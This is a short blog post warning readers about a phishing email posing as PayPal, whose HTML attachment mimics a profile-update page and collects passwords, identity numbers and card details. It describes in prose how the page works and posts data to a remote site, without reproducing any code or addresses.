Phishing email targeting PayPal customers to steal user account information.
Below seen is the mail I received today which claims to be
from PayPal. It says my PayPal account has been limited, and to restore my
account access asks me to fill in the attached form.
The attached form “PP-658-119-347.htm”
is an html file containing obfuscated java script.
Deobfuscation shows the original script used to collect personal information of the user.
On opening the mail attachment
it displays a page similar to PayPal profile update. Its an html file well designed
to look similar to PayPal. How do we know that? Here you haven’t logged into
any account using your credentials but still you can see the logout button
below as if you have logged in. Also, remember you have opened an HTML file not
the original website check your address bar.
It collects basic profile
information along with your PayPal password. Next page it checks which country you
belong to. If you’re from US you will be prompted with additional box asking
for “Social Security Number.” If Sweden prompts for “Personal identity number.”
Likewise it displays based on the Country.
Finally it asks you to
enter Credit/Debit card information. It even validates the input field if you try to
ignore or enter invalid data it will pop up an alert message.
So, Where does it sends these
information? The answer can be found below. It will POST the collected
information to a remote site. The remote site may be a compromised site. Once account
information are collected the hacker will use it.
Beware of these phishing email scams and avoid entering your personal information when prompted through email. Always go to the trusted secure site to update your personal and financial information.
No comments:
Post a Comment